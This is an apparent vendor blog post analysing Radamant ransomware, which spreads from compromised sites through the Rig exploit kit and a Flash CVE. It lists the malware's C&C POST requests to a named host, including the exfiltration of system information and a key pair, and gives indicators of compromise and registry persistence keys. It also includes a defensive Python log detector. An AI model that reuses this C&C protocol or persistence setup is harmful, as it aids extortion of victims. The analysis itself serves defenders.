A new ransomware family called Radamant was discovered in early December 2015. On December 31, we found compromised websites redirecting to the Rig Exploit Kit, which then downloads this ransomware. The following sites were infected:
- www.yatra.com
- www.herbeauty.co
Figure: Infection chain on yatra.com
Figure: Infection chain on herbeauty.co
On each affected page, malicious HTML code was injected at the end of the page. The code loads a malicious Flash file that redirects the browser to the Rig EK landing page.
Figure: Injected code
As of this writing, both websites are free from infection.
Flash Exploit
The Rig EK instances on both sites use the same Flash exploit and deliver the same payload. The Flash exploit targets the following vulnerability:
- CVE-2015-5560
This is an old exploit that affects Flash Player versions 18.0.0.209 and below. The vulnerability was patched on August 15, 2015 via the Adobe Flash Player 18.0.0.232 update. After successful exploitation, the exploit downloads its payload.
Radamant Ransomware
This is a new breed of ransomware that encrypts files using AES-256. Bleepingcomputer.com provides excellent coverage of this ransomware. The malware was also found to be leased as a kit on private malicious sites: it costs $1,000 USD to rent for one month, or potential buyers can test it for 48 hours for $100 USD.
- Source: http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/
As early as December 14, people have been complaining on the Bleepingcomputer forum that their files were encrypted and renamed with a .RDM or .RRK extension. The malware scans for files matching certain extensions and encrypts each of them with a unique AES-256 key. Each per-file AES-256 key is then encrypted with a master key, and the encrypted key is embedded into the target file.
Network Connections:
The malware first issues a POST request to its C&C server at http://cutenaskare.com/domains.php to obtain the list of C&C domains to use:
POST http://cutenaskare.com/domains.php
Server Reply: [7:cutenaskare.com]
It then POSTs to http://cutenaskare.com/API.php with its ID and IP address to check whether it is already registered with the server:
POST http://cutenaskare.com/API.php id={machine fingerprint}&ip={victims IP address}
Server Reply: [0:unknownID][6:{IP region e.g., RU}]
If the victim is new, the server replies with [0:unknownID], which instructs the bot to register and post additional system information:
POST http://cutenaskare.com/API.php id={machine fingerprint}&apt=0&os={OS version}&ip={victims IP address}&bits={32 or 64 bit}&discs={Drive Letters}&pub={public key}&prv={private key}
Server Reply:[r:good]
The server then sends its public key, and the malware POSTs to:
POST http://cutenaskare.com/mask.php
The server replies with the list of file extensions to encrypt, which also triggers the start of encryption. After the malware has finished encrypting files, it shows the following page informing the user that their files have been encrypted and instructing the victim to pay 0.5 Bitcoin (approx. 220 USD).
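The beacon sequence above is distinctive enough to detect from proxy logs. The following is an added example (not Cyphort's code or anything from the malware) that classifies POSTs to the C&C endpoints by stage and parses the bracketed server replies; the log line format and all sample values are constructed for this example.

```python
import re
from typing import Dict, List, Optional
# Beacon sequence seen in the analysis: domains.php -> API.php (check-in / registration) -> mask.php.
C2_HOST = "cutenaskare.com"
CHECKIN_KEYS = {"id", "ip"}
REGISTRATION_KEYS = {"id", "apt", "os", "ip", "bits", "discs", "pub", "prv"}
SIMPLE_STAGES = {"/domains.php": "domain lookup", "/mask.php": "extension list / encryption start"}
REPLY_TOKEN = re.compile(r"\[([^:\]]+):([^\]]*)\]")
# Constructed proxy-log format (assumed): '<ts> <src> POST <url> body="..." reply="..."'.
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) POST http://(?P<host>[^/]+)(?P<path>\S+) '
                      r'body="(?P<body>[^"]*)" reply="(?P<reply>[^"]*)"$')

def parse_reply(body: str) -> Dict[str, str]:
    """Split a reply such as '[0:unknownID][6:RU]' into {'0': 'unknownID', '6': 'RU'}."""
    return {code: value for code, value in REPLY_TOKEN.findall(body)}

def classify_post(host: str, path: str, body: str) -> Optional[str]:
    """Name the Radamant beacon stage a POST matches, or None if it is not C&C traffic."""
    if host.lower() != C2_HOST:
        return None
    if path in SIMPLE_STAGES:
        return SIMPLE_STAGES[path]
    if path == "/API.php":
        keys = {kv.split("=", 1)[0] for kv in body.split("&") if kv}
        if REGISTRATION_KEYS <= keys:
            return "registration (system info and key pair posted)"
        if CHECKIN_KEYS <= keys:
            return "check-in"
    return None

def scan_log(lines: List[str]) -> List[dict]:
    """Return one hit per C&C beacon, noting whether the server treated the host as a new victim."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        stage = classify_post(m["host"], m["path"], m["body"]) if m else None
        if stage is None:
            continue
        reply = parse_reply(m["reply"])
        hits.append({"ts": m["ts"], "src": m["src"], "stage": stage,
                     "new_victim": reply.get("0") == "unknownID", "region": reply.get("6")})
    return hits

# Constructed sample log: one infected host running the full beacon sequence.
SAMPLE_LOG = [
    '2015-12-31T10:00:01Z 10.0.0.7 POST http://cutenaskare.com/domains.php body="" reply="[7:cutenaskare.com]"',
    '2015-12-31T10:00:02Z 10.0.0.7 POST http://cutenaskare.com/API.php body="id=ABC123&ip=203.0.113.5" reply="[0:unknownID][6:RU]"',
    '2015-12-31T10:00:03Z 10.0.0.7 POST http://cutenaskare.com/API.php body="id=ABC123&apt=0&os=6.1&ip=203.0.113.5&bits=64&discs=CD&pub=PUB&prv=PRV" reply="[r:good]"',
    '2015-12-31T10:00:04Z 10.0.0.7 POST http://cutenaskare.com/mask.php body="" reply=""',
]
```

A check-in answered with [0:unknownID] marks the first contact of a new victim, and the registration POST that follows carries the key pair, so an alert on either stage fires before mask.php triggers encryption.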
Luckily, the malware's encryption has flaws that allowed Fabian Wosar to recover the encrypted files without paying the ransom.
Fabian's tool can be downloaded from the following link:
- emsi.at/DecryptRadamant
The tool has been updated to support the latest known version. It is also evident that the malware authors aren't pleased with Fabian, as they placed some cursing strings in the code of the latest version.
The first version of Radamant was first seen on VirusTotal on December 3, 2015, and we have identified three versions to date.
| Version | MD5 | Mutex Name | Extension of Encrypted Files |
|---|---|---|---|
| 1 | e62d58a48f3aca29acd535c3ae4b7ce1 | Radamant_v1_Klitschko_number_one | .RDM |
| 2 | a40f1a7d3c1db966bbabdeb965697c1b | Radamant_v2_Klitschko_number_one | .RDM |
| 2.1 | 72c71e4c78af74f4e500f1422a2f9092 | \Sessions\1radamantv2_emisoft_fucked | .RRK |
Indicators of Compromise
Mutex Names:
Radamant_v1_Klitschko_number_one
Radamant_v2_Klitschko_number_one
\Sessions\1radamantv2_emisoft_fucked
Install Path:
C:\Windows\DirectX.exe
Registry Keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value: svchost or DirectX
Data: C:\Windows\directx.exe
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Value: svchost or DirectX
Data: C:\Windows\directx.exe
The post Radamant Ransomware distributed via Rig EK appeared first on Cyphort.